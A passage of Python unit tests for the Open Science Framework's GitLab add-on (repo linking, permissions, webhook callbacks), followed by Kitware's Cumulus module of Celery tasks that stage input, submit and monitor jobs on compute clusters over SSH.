'gitlab_user': 'octocat',
'gitlab_repo': 'repo_name',
'gitlab_repo_id': '123',
}, auth=self.user.auth)
assert_equal(res.status_code, http_status.HTTP_200_OK)
self.project.reload()
assert_equal(
self.project.logs.latest().action,
'{0}_repo_linked'.format(self.ADDON_SHORT_NAME)
)
mock_add_hook.assert_called_once_with(save=False)
# TODO: Test remaining CRUD methods
# TODO: Test exception handling
class TestCRUD(OsfTestCase):
def setUp(self):
super(TestCRUD, self).setUp()
self.gitlab = create_mock_gitlab(user='fred', private=False)
self.user = AuthUserFactory()
self.consolidated_auth = Auth(user=self.user)
self.project = ProjectFactory(creator=self.user)
self.project.add_addon('gitlab', auth=self.consolidated_auth)
self.project.creator.add_addon('gitlab')
self.node_settings = self.project.get_addon('gitlab')
self.node_settings.user_settings = self.project.creator.get_addon('gitlab')
# Set the node addon settings to correspond to the values of the mock repo
self.node_settings.user = self.gitlab.repo.return_value.owner.login
self.node_settings.repo = self.gitlab.repo.return_value.name
self.node_settings.save()
class TestGitLabViews(OsfTestCase):
def setUp(self):
super(TestGitLabViews, self).setUp()
self.user = AuthUserFactory()
self.consolidated_auth = Auth(user=self.user)
self.project = ProjectFactory(creator=self.user)
self.non_authenticator = UserFactory()
self.project.add_contributor(
contributor=self.non_authenticator,
auth=self.consolidated_auth,
)
self.project.save()
self.project.add_addon('gitlab', auth=self.consolidated_auth)
self.project.creator.add_addon('gitlab')
self.project.creator.external_accounts.add(GitLabAccountFactory())
self.project.creator.save()
self.gitlab = create_mock_gitlab(user='fred', private=False)
self.node_settings = self.project.get_addon('gitlab')
self.node_settings.user_settings = self.project.creator.get_addon('gitlab')
# Set the node addon settings to correspond to the values of the mock repo
self.node_settings.user = 'fred'
self.node_settings.repo = 'mock-repo'
self.node_settings.repo_id = 1748448
self.node_settings.save()
def _get_sha_for_branch(self, branch=None, mock_branches=None):
gitlab_mock = self.gitlab
if mock_branches is None:
mock_branches = gitlab_mock.branches
if branch is None: # Get default branch name
branch = self.gitlab.repo.default_branch
for each in mock_branches:
if each.name == branch:
branch_sha = each.commit['id']
return branch_sha
# Tests for _get_refs
@mock.patch('addons.gitlab.api.GitLabClient.branches')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_get_refs_defaults(self, mock_repo, mock_branches):
gitlab_mock = self.gitlab
mock_repo.return_value = gitlab_mock.repo
mock_branches.return_value = gitlab_mock.branches.return_value
branch, sha, branches = utils.get_refs(self.node_settings)
assert_equal(
branch,
gitlab_mock.repo.default_branch
)
assert_equal(sha, branches[0].commit['id']) # Get refs for default branch
assert_equal(
branches,
gitlab_mock.branches.return_value
)
@mock.patch('addons.gitlab.api.GitLabClient.branches')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_get_refs_branch(self, mock_repo, mock_branches):
gitlab_mock = self.gitlab
mock_repo.return_value = gitlab_mock.repo.return_value
mock_branches.return_value = gitlab_mock.branches.return_value
branch, sha, branches = utils.get_refs(self.node_settings, 'master')
assert_equal(branch, 'master')
assert_equal(sha, branches[0].commit['id'])
assert_equal(
branches,
gitlab_mock.branches.return_value
)
def test_before_fork(self):
url = self.project.api_url + 'fork/before/'
res = self.app.get(url, auth=self.user.auth).maybe_follow()
assert_equal(len(res.json['prompts']), 1)
@mock.patch('addons.gitlab.models.UserSettings.has_auth')
def test_before_register(self, mock_has_auth):
mock_has_auth.return_value = True
url = self.project.api_url + 'beforeregister/'
res = self.app.get(url, auth=self.user.auth).maybe_follow()
assert_true('GitLab' in res.json['prompts'][1])
def test_get_refs_sha_no_branch(self):
with assert_raises(HTTPError):
utils.get_refs(self.node_settings, sha='12345')
# Tests for _check_permissions
# make a user with no authorization; make sure check_permissions returns false
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_permissions_no_auth(self, mock_repo):
gitlab_mock = self.gitlab
# project is set to private right now
mock_repository = mock.Mock(**{
'user': 'fred',
'repo': 'mock-repo',
'permissions': {
'project_access': {'access_level': 20, 'notification_level': 3}
},
})
mock_repo.attributes.return_value = mock_repository
connection = gitlab_mock
non_authenticated_user = UserFactory()
non_authenticated_auth = Auth(user=non_authenticated_user)
branch = 'master'
assert_false(check_permissions(self.node_settings, non_authenticated_auth, connection, branch, repo=mock_repository))
# make a repository that doesn't allow push access for this user;
# make sure check_permissions returns false
@mock.patch('addons.gitlab.models.UserSettings.has_auth')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_permissions_no_access(self, mock_repo, mock_has_auth):
gitlab_mock = self.gitlab
mock_has_auth.return_value = True
connection = gitlab_mock
branch = 'master'
mock_repository = mock.Mock(**{
'user': 'fred',
'repo': 'mock-repo',
'permissions': {
'project_access': {'access_level': 20, 'notification_level': 3}
},
})
mock_repo.attributes.return_value = mock_repository
assert_false(check_permissions(self.node_settings, self.consolidated_auth, connection, branch, repo=mock_repository))
# make a branch with a different commit than the commit being passed into check_permissions
@mock.patch('addons.gitlab.models.UserSettings.has_auth')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_permissions_not_head(self, mock_repo, mock_has_auth):
gitlab_mock = self.gitlab
mock_has_auth.return_value = True
connection = gitlab_mock
mock_branch = mock.Mock(**{
'commit': {'id': '67890'}
})
mock_repository = mock.Mock(**{
'user': 'fred',
'repo': 'mock-repo',
'permissions': {
'project_access': {'access_level': 20, 'notification_level': 3}
},
})
mock_repo.attributes.return_value = mock_repository
connection.branches.return_value = mock_branch
sha = '12345'
assert_false(check_permissions(self.node_settings, self.consolidated_auth, connection, mock_branch, sha=sha, repo=mock_repository))
# make sure permissions are not granted for editing a registration
@mock.patch('addons.gitlab.models.UserSettings.has_auth')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_permissions(self, mock_repo, mock_has_auth):
gitlab_mock = self.gitlab
mock_has_auth.return_value = True
connection = gitlab_mock
mock_repository = mock.Mock(**{
'user': 'fred',
'repo': 'mock-repo',
'permissions': {
'project_access': {'access_level': 20, 'notification_level': 3}
},
})
mock_repo.attributes.return_value = mock_repository
with mock.patch('osf.models.node.AbstractNode.is_registration', new_callable=mock.PropertyMock) as mock_is_reg:
mock_is_reg.return_value = True
assert_false(check_permissions(self.node_settings, self.consolidated_auth, connection, 'master', repo=mock_repository))
def check_hook_urls(self, urls, node, path, sha):
url = node.web_url_for('addon_view_or_download_file', path=path, provider='gitlab')
expected_urls = {
'view': '{0}?branch={1}'.format(url, sha),
'download': '{0}?action=download&branch={1}'.format(url, sha)
}
assert_equal(urls['view'], expected_urls['view'])
assert_equal(urls['download'], expected_urls['download'])
@mock.patch('addons.gitlab.views.verify_hook_signature')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_hook_callback_add_file_not_thro_osf(self, mock_repo, mock_verify):
gitlab_mock = self.gitlab
gitlab_mock.repo = mock_repo
url = '/api/v1/project/{0}/gitlab/hook/'.format(self.project._id)
timestamp = str(datetime.datetime.utcnow())
self.app.post_json(
url,
{
'test': True,
'commits': [{
'id': 'b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'distinct': True,
'message': 'foo',
'timestamp': timestamp,
'url': 'https://gitlab.com/tester/addontesting/commit/b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'author': {'name': 'Illidan', 'email': 'njqpw@osf.io'},
'committer': {'name': 'Testor', 'email': 'test@osf.io', 'username': 'tester'},
'added': ['PRJWN3TV'],
'removed': [],
'modified': [],
}]
},
content_type='application/json',
).maybe_follow()
self.project.reload()
assert_equal(self.project.logs.latest().action, 'gitlab_file_added')
urls = self.project.logs.latest().params['urls']
self.check_hook_urls(
urls,
self.project,
path='PRJWN3TV',
sha='b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
)
@mock.patch('addons.gitlab.views.verify_hook_signature')
def test_hook_callback_modify_file_not_thro_osf(self, mock_verify):
url = '/api/v1/project/{0}/gitlab/hook/'.format(self.project._id)
timestamp = str(datetime.datetime.utcnow())
self.app.post_json(
url,
{'test': True,
'commits': [{'id': 'b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'distinct': True,
'message': ' foo',
'timestamp': timestamp,
'url': 'https://gitlab.com/tester/addontesting/commit/b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'author': {'name': 'Illidan', 'email': 'njqpw@osf.io'},
'committer': {'name': 'Testor', 'email': 'test@osf.io',
'username': 'tester'},
'added': [], 'removed':[], 'modified':['PRJWN3TV']}]},
content_type='application/json').maybe_follow()
self.project.reload()
assert_equal(self.project.logs.latest().action, 'gitlab_file_updated')
urls = self.project.logs.latest().params['urls']
self.check_hook_urls(
urls,
self.project,
path='PRJWN3TV',
sha='b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
)
@mock.patch('addons.gitlab.views.verify_hook_signature')
def test_hook_callback_remove_file_not_thro_osf(self, mock_verify):
url = '/api/v1/project/{0}/gitlab/hook/'.format(self.project._id)
timestamp = str(datetime.datetime.utcnow())
self.app.post_json(
url,
{'test': True,
'commits': [{'id': 'b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'distinct': True,
'message': 'foo',
'timestamp': timestamp,
'url': 'https://gitlab.com/tester/addontesting/commit/b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'author': {'name': 'Illidan', 'email': 'njqpw@osf.io'},
'committer': {'name': 'Testor', 'email': 'test@osf.io', 'username': 'tester'},
'added': [], 'removed': ['PRJWN3TV'], 'modified':[]}]},
content_type='application/json').maybe_follow()
self.project.reload()
assert_equal(self.project.logs.latest().action, 'gitlab_file_removed')
urls = self.project.logs.latest().params['urls']
assert_equal(urls, {})
@mock.patch('addons.gitlab.views.verify_hook_signature')
def test_hook_callback_add_file_thro_osf(self, mock_verify):
url = '/api/v1/project/{0}/gitlab/hook/'.format(self.project._id)
self.app.post_json(
url,
{'test': True,
'commits': [{'id': 'b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'distinct': True,
'message': 'Added via the Open Science Framework',
'timestamp': '2014-01-08T14:15:51-08:00',
'url': 'https://gitlab.com/tester/addontesting/commit/b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'author': {'name': 'Illidan', 'email': 'njqpw@osf.io'},
'committer': {'name': 'Testor', 'email': 'test@osf.io', 'username': 'tester'},
'added': ['PRJWN3TV'], 'removed':[], 'modified':[]}]},
content_type='application/json').maybe_follow()
self.project.reload()
assert_not_equal(self.project.logs.latest().action, 'gitlab_file_added')
@mock.patch('addons.gitlab.views.verify_hook_signature')
def test_hook_callback_modify_file_thro_osf(self, mock_verify):
url = '/api/v1/project/{0}/gitlab/hook/'.format(self.project._id)
self.app.post_json(
url,
{'test': True,
'commits': [{'id': 'b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'distinct': True,
'message': 'Updated via the Open Science Framework',
'timestamp': '2014-01-08T14:15:51-08:00',
'url': 'https://gitlab.com/tester/addontesting/commit/b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'author': {'name': 'Illidan', 'email': 'njqpw@osf.io'},
'committer': {'name': 'Testor', 'email': 'test@osf.io', 'username': 'tester'},
'added': [], 'removed':[], 'modified':['PRJWN3TV']}]},
content_type='application/json').maybe_follow()
self.project.reload()
assert_not_equal(self.project.logs.latest().action, 'gitlab_file_updated')
@mock.patch('addons.gitlab.views.verify_hook_signature')
def test_hook_callback_remove_file_thro_osf(self, mock_verify):
url = '/api/v1/project/{0}/gitlab/hook/'.format(self.project._id)
self.app.post_json(
url,
{'test': True,
'commits': [{'id': 'b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'distinct': True,
'message': 'Deleted via the Open Science Framework',
'timestamp': '2014-01-08T14:15:51-08:00',
'url': 'https://gitlab.com/tester/addontesting/commit/b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'author': {'name': 'Illidan', 'email': 'njqpw@osf.io'},
'committer': {'name': 'Testor', 'email': 'test@osf.io', 'username': 'tester'},
'added': [], 'removed':['PRJWN3TV'], 'modified':[]}]},
content_type='application/json').maybe_follow()
self.project.reload()
assert_not_equal(self.project.logs.latest().action, 'gitlab_file_removed')
class TestRegistrationsWithGitLab(OsfTestCase):
def setUp(self):
super(TestRegistrationsWithGitLab, self).setUp()
self.project = ProjectFactory.build()
self.project.save()
self.consolidated_auth = Auth(user=self.project.creator)
self.project.add_addon('gitlab', auth=self.consolidated_auth)
self.project.creator.add_addon('gitlab')
self.node_settings = self.project.get_addon('gitlab')
self.user_settings = self.project.creator.get_addon('gitlab')
self.node_settings.user_settings = self.user_settings
self.node_settings.user = 'Queen'
self.node_settings.repo = 'Sheer-Heart-Attack'
self.node_settings.save()
class TestGitLabSettings(OsfTestCase):
def setUp(self):
super(TestGitLabSettings, self).setUp()
self.gitlab = create_mock_gitlab(user='fred', private=False)
self.project = ProjectFactory()
self.auth = self.project.creator.auth
self.consolidated_auth = Auth(user=self.project.creator)
self.project.add_addon('gitlab', auth=self.consolidated_auth)
self.project.creator.add_addon('gitlab')
self.node_settings = self.project.get_addon('gitlab')
self.user_settings = self.project.creator.get_addon('gitlab')
self.node_settings.user_settings = self.user_settings
self.node_settings.user = 'Queen'
self.node_settings.repo = 'Sheer-Heart-Attack'
self.node_settings.repo_id = 'sheer-heart-attack'
self.node_settings.save()
@mock.patch('addons.gitlab.models.NodeSettings.add_hook')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_link_repo(self, mock_repo, mock_add_hook):
gitlab_mock = self.gitlab
mock_repo.return_value = gitlab_mock.repo.return_value
url = self.project.api_url + 'gitlab/settings/'
self.app.post_json(
url,
{
'gitlab_user': 'queen',
'gitlab_repo': 'night at the opera',
'gitlab_repo_id': 'abc',
},
auth=self.auth
).maybe_follow()
self.project.reload()
self.node_settings.reload()
assert_equal(self.node_settings.user, 'queen')
assert_equal(self.node_settings.repo, 'night at the opera')
assert_equal(self.project.logs.latest().action, 'gitlab_repo_linked')
mock_add_hook.assert_called_once_with(save=False)
@mock.patch('addons.gitlab.models.NodeSettings.add_hook')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_link_repo_no_change(self, mock_repo, mock_add_hook):
gitlab_mock = self.gitlab
mock_repo.return_value = gitlab_mock.repo.return_value
log_count = self.project.logs.count()
url = self.project.api_url + 'gitlab/settings/'
self.app.post_json(
url,
{
'gitlab_user': self.node_settings.user,
'gitlab_repo': self.node_settings.repo,
'gitlab_repo_id': self.node_settings.repo_id,
},
auth=self.auth
).maybe_follow()
self.project.reload()
self.node_settings.reload()
assert_equal(self.project.logs.count(), log_count)
assert_false(mock_add_hook.called)
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_link_repo_non_existent(self, mock_repo):
mock_repo.return_value = None
url = self.project.api_url + 'gitlab/settings/'
res = self.app.post_json(
url,
{
'gitlab_user': 'queen',
'gitlab_repo': 'night at the opera',
},
auth=self.auth,
expect_errors=True
).maybe_follow()
assert_equal(res.status_code, 400)
@mock.patch('addons.gitlab.api.GitLabClient.branches')
def test_link_repo_registration(self, mock_branches):
mock_branches.return_value = [
Branch.from_json(dumps({
'name': 'master',
'commit': {
'sha': '6dcb09b5b57875f334f61aebed695e2e4193db5e',
'url': 'https://api.gitlab.com/repos/octocat/Hello-World/commits/c5b97d5ae6c19d5c5df71a34c7fbeeda2479ccbc',
}
})),
Branch.from_json(dumps({
'name': 'develop',
'commit': {
'sha': '6dcb09b5b57875asdasedawedawedwedaewdwdass',
'url': 'https://api.gitlab.com/repos/octocat/Hello-World/commits/cdcb09b5b57875asdasedawedawedwedaewdwdass',
}
}))
]
registration = self.project.register_node(
schema=get_default_metaschema(),
auth=self.consolidated_auth,
data=''
)
url = registration.api_url + 'gitlab/settings/'
res = self.app.post_json(
url,
{
'gitlab_user': 'queen',
'gitlab_repo': 'night at the opera',
},
auth=self.auth,
expect_errors=True
).maybe_follow()
assert_equal(res.status_code, 400)
@mock.patch('addons.gitlab.models.NodeSettings.delete_hook')
def test_deauthorize(self, mock_delete_hook):
url = self.project.api_url + 'gitlab/user_auth/'
self.app.delete(url, auth=self.auth).maybe_follow()
self.project.reload()
self.node_settings.reload()
assert_equal(self.node_settings.user, None)
assert_equal(self.node_settings.repo, None)
assert_equal(self.node_settings.user_settings, None)
assert_equal(self.project.logs.latest().action, 'gitlab_node_deauthorized')
if __name__ == '__main__':
unittest.main()
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright 2015 Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
from __future__ import absolute_import
import traceback
from cumulus.common import check_status
from cumulus.common import get_post_logger, get_job_logger
from cumulus.common import get_cluster_logger
from cumulus.celery import command, monitor
import cumulus
import cumulus.girderclient
import cumulus.constants
from cumulus.constants import ClusterType, JobQueueState
from cumulus.queue import get_queue_adapter
from cumulus.queue.abstract import AbstractQueueAdapter
from cumulus.transport import get_connection
from cumulus.transport.files.download import download_path
from cumulus.transport.files.upload import upload_path
from cumulus.transport.files import get_assetstore_url_base, get_assetstore_id
import requests
import os
import re
import inspect
import time
import uuid
from six import StringIO
from celery import signature
from celery.exceptions import Retry
from jinja2 import Environment, Template, PackageLoader
from jsonpath_rw import parse
import tempfile
from girder_client import HttpError
import paramiko
def _put_script(conn, script_commands):
script_name = uuid.uuid4().hex
script = script_commands + 'echo $!\n'
conn.put(StringIO(script), script_name)
cmd = './%s' % script_name
conn.execute('chmod 700 %s' % cmd)
return cmd
def job_directory(cluster, job, user_home='.'):
"""
Returns the job directory for a given job.
:param cluster: The job the cluster is running on.
:param job: The job to return the directory for.
"""
# First try the job parameters
output_root = parse('params.jobOutputDir').find(job)
if output_root:
output_root = output_root[0].value
else:
# Try the cluster
output_root = parse('config.jobOutputDir').find(cluster)
if output_root:
output_root = output_root[0].value
else:
output_root = user_home
return os.path.join(output_root, job['_id'])
def download_job_input_items(cluster, job, log_write_url=None,
girder_token=None):
headers = {'Girder-Token': girder_token}
job_id = job['_id']
status_url = '%s/jobs/%s' % (cumulus.config.girder.baseUrl, job_id)
try:
with get_connection(girder_token, cluster) as conn:
# First put girder client on master
path = inspect.getsourcefile(cumulus.girderclient)
with open(path, 'r') as fp:
conn.put(fp, os.path.basename(path))
r = requests.patch(status_url, json={'status': 'downloading'},
headers=headers)
check_status(r)
download_cmd = 'python girderclient.py --token %s --url "%s" ' \
'download --dir %s --job %s' \
% (girder_token, cumulus.config.girder.baseUrl,
job_directory(cluster, job), job_id)
download_output = '%s.download.out' % job_id
download_cmd = 'nohup %s &> %s &\n' % (download_cmd,
download_output)
download_cmd = _put_script(conn, download_cmd)
output = conn.execute(download_cmd)
# Remove download script
conn.remove(download_cmd)
if len(output) != 1:
raise Exception('PID not returned by execute command')
try:
pid = int(output[0])
except ValueError:
raise Exception('Unable to extract PID from: %s' % output)
# When the download is complete submit the job
on_complete = submit_job.s(cluster, job, log_write_url=log_write_url,
girder_token=girder_token)
monitor_process.delay(cluster, job, pid, download_output,
log_write_url=log_write_url,
on_complete=on_complete,
girder_token=girder_token)
except Exception as ex:
r = requests.patch(status_url, headers=headers,
json={'status': 'error'})
check_status(r)
get_job_logger(job, girder_token).exception(str(ex))
def download_job_input_folders(cluster, job, log_write_url=None,
girder_token=None, submit=True):
job_dir = job_directory(cluster, job)
with get_connection(girder_token, cluster) as conn:
for input in job['input']:
if 'folderId' in input and 'path' in input:
folder_id = input['folderId']
path = input['path']
upload_path(conn, girder_token, folder_id,
os.path.join(job_dir, path))
if submit:
submit_job.delay(cluster, job, log_write_url=log_write_url,
girder_token=girder_token)
@command.task
def download_job_input(cluster, job, log_write_url=None, girder_token=None):
job_url = '%s/jobs/%s/log' % (cumulus.config.girder.baseUrl, job['_id'])
log = get_post_logger(job['_id'], girder_token, job_url)
# Create job directory
with get_connection(girder_token, cluster) as conn:
conn.makedirs(job_directory(cluster, job))
log.info('Downloading input for "%s"' % job['name'])
if parse('input.itemId').find(job):
download_job_input_items(cluster, job, log_write_url=log_write_url,
girder_token=girder_token)
else:
download_job_input_folders(cluster, job, log_write_url=log_write_url,
girder_token=girder_token)
def _get_parallel_env(cluster, job):
parallel_env = None
if 'parallelEnvironment' in job.get('params', {}):
parallel_env = job['params']['parallelEnvironment']
elif 'parallelEnvironment' in cluster['config']:
parallel_env = cluster['config']['parallelEnvironment']
# if this is a ec2 cluster then we can default to orte
if not parallel_env and cluster['type'] == ClusterType.EC2:
parallel_env = 'orte'
return parallel_env
def _is_terminating(job, girder_token):
headers = {'Girder-Token': girder_token}
status_url = '%s/jobs/%s/status' % (cumulus.config.girder.baseUrl,
job['_id'])
r = requests.get(status_url, headers=headers)
check_status(r)
current_status = r.json()['status']
return current_status in [JobState.TERMINATED, JobState.TERMINATING]
def _generate_submission_script(job, cluster, job_params):
env = Environment(loader=PackageLoader('cumulus', 'templates'))
template = env.get_template('template.sh')
script = template.render(cluster=cluster, job=job,
baseUrl=cumulus.config.girder.baseUrl,
**job_params)
# We now render again to ensure any template variable in the jobs
# commands are filled out.
script = Template(script).render(cluster=cluster, job=job,
baseUrl=cumulus.config.girder.baseUrl,
**job_params)
return script
def _get_on_complete(job):
on_complete = parse('onComplete.cluster').find(job)
if on_complete:
on_complete = on_complete[0].value
else:
on_complete = None
return on_complete
@command.task
def submit_job(cluster, job, log_write_url=None, girder_token=None,
monitor=True):
job_url = '%s/jobs/%s/log' % (cumulus.config.girder.baseUrl, job['_id'])
log = get_post_logger(job['_id'], girder_token, job_url)
headers = {'Girder-Token': girder_token}
job_id = job['_id']
status_url = '%s/jobs/%s' % (cumulus.config.girder.baseUrl, job_id)
try:
# if terminating break out
if _is_terminating(job, girder_token):
return
script_name = job['name']
with get_connection(girder_token, cluster) as conn:
job_params = {}
if 'params' in job:
job_params = job['params']
output = conn.execute('pwd')
if len(output) != 1:
raise Exception('Unable to fetch users home directory.')
user_home = output[0].strip()
job_dir = job_directory(cluster, job, user_home=user_home)
job['dir'] = job_dir
slots = -1
# Try job parameters first
slots = int(job_params.get('numberOfSlots', slots))
if slots == -1:
# Try the cluster
slots = int(cluster['config'].get('numberOfSlots', slots))
parallel_env = _get_parallel_env(cluster, job)
if parallel_env:
job_params['parallelEnvironment'] = parallel_env
# If the number of slots has not been provided we will get
# the number of slots from the parallel environment
if slots == -1:
slots = int(get_queue_adapter(cluster, conn)
.number_of_slots(parallel_env))
if slots > 0:
job_params['numberOfSlots'] = slots
script = _generate_submission_script(job, cluster, job_params)
conn.makedirs(job_dir)
# put the script to master
conn.put(StringIO(script), os.path.join(job_dir, script_name))
if slots > -1:
log.info('We have %s slots available' % slots)
# Now submit the job
queue_job_id \
= get_queue_adapter(cluster, conn).submit_job(job,
script_name)
# Update the state and queue job id
job[AbstractQueueAdapter.QUEUE_JOB_ID] = queue_job_id
patch_data = {
'status': JobState.QUEUED,
AbstractQueueAdapter.QUEUE_JOB_ID: queue_job_id,
'dir': job_dir
}
r = requests.patch(status_url, headers=headers, json=patch_data)
check_status(r)
job = r.json()
job['queuedTime'] = time.time()
# Now monitor the jobs progress
if monitor:
monitor_job.s(
cluster, job, log_write_url=log_write_url,
girder_token=girder_token).apply_async(countdown=5)
# Now update the status of the job
headers = {'Girder-Token': girder_token}
r = requests.patch(status_url, headers=headers,
json={'status': JobState.QUEUED})
check_status(r)
except Exception as ex:
traceback.print_exc()
r = requests.patch(status_url, headers=headers,
json={'status': JobState.UNEXPECTEDERROR})
check_status(r)
get_job_logger(job, girder_token).exception(str(ex))
raise
def submit(girder_token, cluster, job, log_url):
# Do we inputs to download ?
if 'input' in job and len(job['input']) > 0:
download_job_input.delay(cluster, job, log_write_url=log_url,
girder_token=girder_token)
else:
submit_job.delay(cluster, job, log_write_url=log_url,
girder_token=girder_token)
class JobState(object):
CREATED = cumulus.constants.JobState.CREATED
RUNNING = cumulus.constants.JobState.RUNNING
TERMINATED = cumulus.constants.JobState.TERMINATED
TERMINATING = cumulus.constants.JobState.TERMINATING
UNEXPECTEDERROR = cumulus.constants.JobState.UNEXPECTEDERROR
QUEUED = cumulus.constants.JobState.QUEUED
ERROR = cumulus.constants.JobState.ERROR
UPLOADING = cumulus.constants.JobState.UPLOADING
ERROR_UPLOADING = cumulus.constants.JobState.ERROR_UPLOADING
COMPLETE = cumulus.constants.JobState.COMPLETE
def __init__(self, previous, **kwargs):
if previous:
for key in previous._keys:
setattr(self, key, getattr(previous, key))
self._keys = previous._keys
else:
self._keys = kwargs.keys()
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return self.__class__.__name__.lower()
def __lt__(self, other):
return str(self) < str(other)
def __cmp__(self, other):
a = str(self)
b = str(other)
return (a > b) - (a < b)
def __hash__(self):
return hash(str(self))
def _update_queue_time(self, job):
if 'queuedTime' in job:
queued_time = time.time() - job['queuedTime']
job['timings'] = {'queued': int(round(queued_time * 1000))}
del job['queuedTime']
job['runningTime'] = time.time()
def next(self, job_queue_status):
raise NotImplementedError('Should be implemented by subclass')
def run(self):
raise NotImplementedError('Should be implemented by subclass')
class Created(JobState):
def next(self, job_queue_status):
if not job_queue_status or job_queue_status == JobQueueState.COMPLETE:
return Uploading(self)
elif job_queue_status == JobQueueState.RUNNING:
return Running(self)
elif job_queue_status == JobQueueState.QUEUED:
return Queued(self)
elif job_queue_status == JobQueueState.ERROR:
return Error(self)
else:
raise Exception('Unrecognized state: %s' % job_queue_status)
def run(self):
return self
class Queued(JobState):
def next(self, job_queue_status):
if not job_queue_status or job_queue_status == JobQueueState.COMPLETE:
return Uploading(self)
elif job_queue_status == JobQueueState.RUNNING:
return Running(self)
elif job_queue_status == JobQueueState.QUEUED:
return self
elif job_queue_status == JobQueueState.ERROR:
return Error(self)
else:
raise Exception('Unrecognized state: %s' % job_queue_status)
def run(self):
return self
class Running(JobState):
def _tail_output(self):
job_url = '%s/jobs/%s/log' % (cumulus.config.girder.baseUrl,
self.job['_id'])
log = get_post_logger(self.job['_id'], self.girder_token, job_url)
# Do we need to tail any output files
for output in self.job.get('output', []):
if 'tail' in output and output['tail']:
path = output['path']
offset = 0
if 'content' in output:
offset = len(output['content'])
else:
output['content'] = []
tail_path = os.path.join(self.job['dir'], path)
command = 'tail -n +%d %s' % (offset, tail_path)
try:
# Only tail if file exists
if self.conn.isfile(tail_path):
stdout = self.conn.execute(command)
output['content'] = output['content'] + stdout
else:
log.info('Skipping tail of %s as file doesn\'t '
'currently exist' %
tail_path)
except Exception as ex:
get_job_logger(self.job,
self.girder_token).exception(str(ex))
def next(self, job_queue_status):
if not job_queue_status or job_queue_status == JobQueueState.COMPLETE:
return Uploading(self)
elif job_queue_status == JobQueueState.RUNNING:
return self
elif job_queue_status == JobQueueState.ERROR:
return Error(self)
else:
raise Exception('Unrecognized state: %s' % job_queue_status)
def run(self):
self._update_queue_time(self.job)
self._tail_output()
return self
class Complete(JobState):
def next(self, job_queue_status):
error = False
for output in self.job.get('output', []):
if 'errorRegEx' in output and output['errorRegEx']:
stdout_file = '%s-%s.o%s' % (self.job['name'],
self.job['_id'],
self.job['queueJobId'])
stderr_file = '%s-%s.o%s' % (self.job['name'],
self.job['_id'],
self.job['queueJobId'])
variables = {
'stdout': stdout_file,
'stderr': stderr_file
}
tmp_path = None
try:
path = Template(output['path']).render(**variables)
tmp_path = os.path.join(tempfile.tempdir, path)
path = os.path.join(self.job['dir'], path)
self.conn.get(path, localpath=tmp_path)
error_regex = re.compile(output['errorRegEx'])
with open(tmp_path, 'r') as fp:
for line in fp:
if error_regex.match(line):
error = True
break
finally:
if tmp_path and os.path.exists(tmp_path):
os.remove(tmp_path)
if error:
break
if error:
return Error(self)
return self
def run(self):
if _get_on_complete(self.job) == 'terminate':
cluster_log_url = '%s/clusters/%s/log' % \
(cumulus.config.girder.baseUrl, self.cluster['_id'])
command.send_task(
'cumulus.tasks.cluster.terminate_cluster',
args=(self.cluster,),
kwargs={'log_write_url': cluster_log_url,
'girder_token': self.girder_token})
class Terminating(JobState):
def next(self, job_queue_status):
if not job_queue_status or job_queue_status == JobQueueState.COMPLETE:
return Terminated(self)
else:
return self
def run(self):
return self
class Terminated(JobState):
def next(self, task, job, job_queue_status):
return self
def run(self):
return self
class Uploading(JobState):
def next(self, job_queue_status):
job_url = '%s/jobs/%s/log' % (cumulus.config.girder.baseUrl,
self.job['_id'])
log = get_post_logger(self.job['_id'], self.girder_token, job_url)
job_name = self.job['name']
if 'runningTime' in self.job:
running_time = time.time() - self.job['runningTime']
self.job.get('timings', {})['running'] \
= int(round(running_time * 1000))
del self.job['runningTime']
# Fire off task to upload the output
log.info('Job "%s" complete' % job_name)
upload = self.job.get('uploadOutput', True)
if not upload or len(self.job.get('output', [])) == 0:
return Complete(self)
return self
def run(self):
upload = self.job.get('uploadOutput', True)
if upload and len(self.job.get('output', [])) > 0:
upload_job_output.delay(self.cluster, self.job,
log_write_url=self.log_write_url,
job_dir=self.job['dir'],
girder_token=self.girder_token)
class Error(Complete):
def next(self, job_queue_status):
return self
class ErrorUploading(Uploading):
def next(self, job_queue_status):
return Error(self)
def run(self):
return self
class UnexpectedError(JobState):
def next(self, job_queue_status):
return self
def run(self):
return self
state_classes = {
JobState.CREATED: Created,
JobState.QUEUED: Queued,
JobState.RUNNING: Running,
JobState.COMPLETE: Complete,
JobState.TERMINATING: Terminating,
JobState.TERMINATED: Terminated,
JobState.UPLOADING: Uploading,
JobState.ERROR: Error,
JobState.ERROR_UPLOADING: ErrorUploading,
JobState.UNEXPECTEDERROR: UnexpectedError
}
